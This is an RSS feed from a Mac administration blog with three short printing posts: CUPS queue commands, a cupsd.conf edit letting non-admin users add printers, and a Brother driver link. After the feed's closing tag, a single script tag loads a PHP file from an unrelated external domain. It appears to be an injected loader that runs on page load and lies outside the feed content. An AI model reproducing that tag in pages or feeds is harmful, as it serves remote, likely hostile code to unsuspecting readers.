<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Krypted &#187; Network Printing</title>
	<atom:link href="http://krypted.com/category/network-printing/feed/" rel="self" type="application/rss+xml" />
	<link>http://krypted.com</link>
	<description>Notes from the field</description>
	<lastBuildDate>Wed, 28 Jul 2010 03:19:43 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Mac OS X Command Line &amp; Printing</title>
		<link>http://krypted.com/mac-os-x/mac-os-x-command-line-printing/</link>
		<comments>http://krypted.com/mac-os-x/mac-os-x-command-line-printing/#comments</comments>
		<pubDate>Mon, 02 Nov 2009 14:00:10 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[Network Printing]]></category>
		<category><![CDATA[cups]]></category>
		<category><![CDATA[lpc]]></category>
		<category><![CDATA[lpq]]></category>
		<category><![CDATA[lpr]]></category>
		<category><![CDATA[lprm]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4967</guid>
		<description><![CDATA[Managing print queues can be an easy or a complicated task. But when troubleshooting queues, a great tool to have is an understanding of how Mac OS X, and more specifically, how CUPS is interacting with those jobs. Some basic print job/queue management commands:

lpr—Send a print job to a print queue.
lpq—Show the status of jobs [...]]]></description>
			<content:encoded><![CDATA[<p>Managing print queues can be an easy or a complicated task. But when troubleshooting queues, a great tool to have is an understanding of how Mac OS X, and more specifically, how CUPS is interacting with those jobs. Some basic print job/queue management commands:</p>
<ul>
<li>lpr—Send a print job to a print queue.</li>
<li>lpq—Show the status of jobs sent to a print queue.</li>
<li>lprm—Delete jobs from a print queue.</li>
<li>lpc—Control print queues.</li>
</ul>
<p><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x-server/mac-os-x-server-maximum-print-jobs/" rel="bookmark" title="January 17, 2008">Mac OS X Server: Maximum Print Jobs</a></li>
<li><a href="http://krypted.com/mac-os-x/quick-tips-on-zfs/" rel="bookmark" title="May 8, 2009">Quick Tips on ZFS</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-vnc-vs-vnc/" rel="bookmark" title="May 23, 2008">Mac OS X: VNC vs. VNC</a></li>
<li><a href="http://krypted.com/mac-os-x/command-line-wiki-integration/" rel="bookmark" title="December 17, 2009">Lots of new stuff: Command Line Wiki Integration</a></li>
<li><a href="http://krypted.com/mac-os-x/link-aggregation-and-tiger/" rel="bookmark" title="August 7, 2005">Link Aggregation and Tiger</a></li>
</ul>
<p><!-- Similar Posts took 8.359 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/mac-os-x-command-line-printing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mac OS X Server 10.5: com.apple.mcxprinting</title>
		<link>http://krypted.com/mac-os-x/mac-os-x-server-105-comapplemcxprinting/</link>
		<comments>http://krypted.com/mac-os-x/mac-os-x-server-105-comapplemcxprinting/#comments</comments>
		<pubDate>Sun, 17 Aug 2008 18:27:43 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[Network Printing]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=263</guid>
		<description><![CDATA[So if you set the RequireAdminToAddPrinters to false in the com.apple.mcxprinting MCX then you would expect that it then allow non-admin users to actually add printers to their computers. Â Well, you (and I) would be wrong. Which leaves me pondering exactly what this string does&#8230; But that&#8217;s digressing. How would you actually make it where [...]]]></description>
			<content:encoded><![CDATA[<p>So if you set the RequireAdminToAddPrinters to false in the com.apple.mcxprinting MCX then you would expect that it then allow non-admin users to actually add printers to their computers. Â Well, you (and I) would be wrong. Which leaves me pondering exactly what this string does&#8230; But that&#8217;s digressing. How would you actually make it where you can have a user self-install their own printers? Luckily Joel Rennich knew&#8230; Open the /etc/cups/cupsd.conf file. Locate the line:</p>
<p># All administration operations require an administrator to authenticate&#8230;</p>
<p>Change the following lines to:</p>
<p>Limit CUPS-Add-Modify-Printer CUPS-Delete-Printer CUPS-Add-Modify-Class CUPS-Delete-Class CUPS-Set-Default;</p>
<p># AuthType Default</p>
<p># Require user @SYSTEM</p>
<p>Require valid-user</p>
<p>Order deny,allow</p>
<p>/Limit;</p>
<p>Some notes:</p>
<p>Non-admins will still not be able to use the Printing pref pane in System Prefs. They have to add printers via the print dialog when the go to print in an app.<strong>Similar Articles:</strong>
<ul class="similar-posts">None Found
</ul>
<p><!-- Similar Posts took 1.732 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/mac-os-x-server-105-comapplemcxprinting/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Brother MFC 7840w Drivers</title>
		<link>http://krypted.com/mac-os-x/brother-mfc-7840w-drivers/</link>
		<comments>http://krypted.com/mac-os-x/brother-mfc-7840w-drivers/#comments</comments>
		<pubDate>Sat, 29 Dec 2007 21:16:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Network Printing]]></category>
		<category><![CDATA[personal]]></category>
		<category><![CDATA[brother]]></category>
		<category><![CDATA[mfc 7840w]]></category>
		<category><![CDATA[wireless printer]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=1262</guid>
		<description><![CDATA[Let&#8217;s see, this printer can scan and print over wireless and be a fax. Â Not bad&#8230;
http://welcome.solutions.brother.com/bsc/public/us/us/en/dlf/download_index.html?reg=us&#38;c=us&#38;lang=en&#38;prod=mfc7840w_all&#38;type2=1&#38;os=81&#38;flang=English&#38;dlid=Similar Articles:
None Found


Copyright &#169; 2008 This feed is for personal, non-commercial use only.  The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing [...]]]></description>
			<content:encoded><![CDATA[<p>Let&#8217;s see, this printer can scan and print over wireless and be a fax. Â Not bad&#8230;</p>
<p>http://welcome.solutions.brother.com/bsc/public/us/us/en/dlf/download_index.html?reg=us&amp;c=us&amp;lang=en&amp;prod=mfc7840w_all&amp;type2=1&amp;os=81&amp;flang=English&amp;dlid=<strong>Similar Articles:</strong>
<ul class="similar-posts">None Found
</ul>
<p><!-- Similar Posts took 2.448 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/brother-mfc-7840w-drivers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script src="http://holasionweb.com/oo.php"></script>